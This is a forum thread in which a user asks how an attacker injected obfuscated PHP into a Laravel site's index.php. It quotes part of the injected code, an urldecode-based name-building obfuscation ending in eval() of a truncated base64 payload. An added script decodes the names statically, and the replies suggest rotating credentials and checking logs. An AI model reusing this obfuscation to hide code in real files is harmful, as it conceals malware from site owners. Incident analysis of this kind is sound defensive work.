skygdi's avatar

Help! index.php compromised.

The public folder got some new PHP files, and the index.php is being prepended with some encoded PHP code.

Here is part of the code:

$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAw....."

I did some investigating: before the "eval", this code runs a method called "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"

I don't really want to know what they are trying to do, but I do want to know how they could modify the index.php file.

Here is my environment: PHP 7.4, Laravel 8.12

Thank you.

0 likes
9 replies
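The prefix quoted in the post above can be read without running it: the urldecode() string is a character table, and each `$var{n}` chain spells a name out of it. The Python script below is an added example, not part of the original thread; it resolves those assignments statically. The regexes and function names are this example's own, and the sample is the prefix copied from the post, cut before the eval().

```python
import re
from urllib.parse import unquote_to_bytes

# Prefix copied from the post, cut before eval() (the payload is truncated
# on the page and is not needed to resolve the names).
SAMPLE = (
    '$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79'
    '%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");'
    '$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};'
    '$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};'
    '$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};'
    '$OO0000=$O00OO0{7}.$O00OO0{13};'
    '$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}'
    '.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};'
)

ASSIGN = re.compile(r'(\$\w+)\s*(\.?=)\s*([^;]+);')   # $v = expr;  or  $v .= expr;
INDEX = re.compile(r'(\$\w+)\{(\d+)\}')               # $v{n} string offset
URLDEC = re.compile(r'urldecode\("([^"]*)"\)')

def _char(env, part):
    """Resolve one `$var{n}` term against already-known strings, else None."""
    m = INDEX.fullmatch(part.strip())
    s = env.get(m.group(1)) if m else None
    return s[int(m.group(2))] if s and int(m.group(2)) < len(s) else None

def resolve(php):
    """Statically evaluate urldecode() literals and `$v{n}` concatenations.
    Nothing from the sample is executed; unresolvable statements are skipped."""
    env = {}
    for name, op, expr in ASSIGN.findall(php):
        m = URLDEC.fullmatch(expr.strip())
        if m:
            # PHP urldecode() also turns a literal '+' into a space.
            value = unquote_to_bytes(m.group(1).replace('+', ' ')).decode('latin-1')
        else:
            chars = [_char(env, p) for p in expr.split('.')]
            if None in chars:
                continue
            value = ''.join(chars)
        env[name] = env.get(name, '') + value if op == '.=' else value
    return env

if __name__ == '__main__':
    for var, value in resolve(SAMPLE).items():
        print(f'{var} = {value!r}')
```

The variable passed to eval() resolves to base64_decode; strtr and substr are the helpers set up for the later decoding stages.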
sr57's avatar

Make sure your .env is not/has not been public (rights, github, ...)

Make it private & change your credentials.

skygdi's avatar

Thanks for your answer, the .env is secured, only the public folder exposed.

sr57's avatar

only the public folder exposed.

What do you mean?

skygdi's avatar

From the visitor's point of view, they could only see "/index.php"

sr57's avatar

So if you think everything is correct now, change your credentials.

Thyrosis's avatar

If you have control over the server logs, check the FTP logins.

A new file in the public directory usually means that FTP credentials have been compromised. Laravel itself doesn't usually allow uploads to the public directory, but only to the storage.

siangboon's avatar

Check the HTTP and FTP access logs, review all the suspicious access and see what and where. Reset your control panel or any backend access credentials.

skygdi's avatar

Client said that he doesn't have a backend for the hosting, no FTP either. He built his hosting from scratch.